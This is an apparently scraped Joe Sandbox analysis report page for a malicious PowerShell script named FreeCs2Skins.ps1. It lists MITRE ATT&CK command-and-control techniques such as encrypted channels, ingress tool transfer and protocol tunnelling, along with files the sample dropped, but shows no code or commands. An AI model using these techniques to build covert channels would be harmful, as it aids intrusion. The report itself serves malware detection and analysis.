Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report FreeCs2Skins.ps1

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Sigma Signatures

System Summary

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

System Summary

Data Obfuscation

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4tledjns.kss.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hxz4i341.os2.ps1

C:\Users\user\AppData\Local\Temp\file.exe

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\3POJUI906RL1T6UDZTGF.temp

C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Network Behavior

Suricata IDS Alerts

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Statistics

CPU Usage

Memory Usage

Windows Analysis Report
FreeCs2Skins.ps1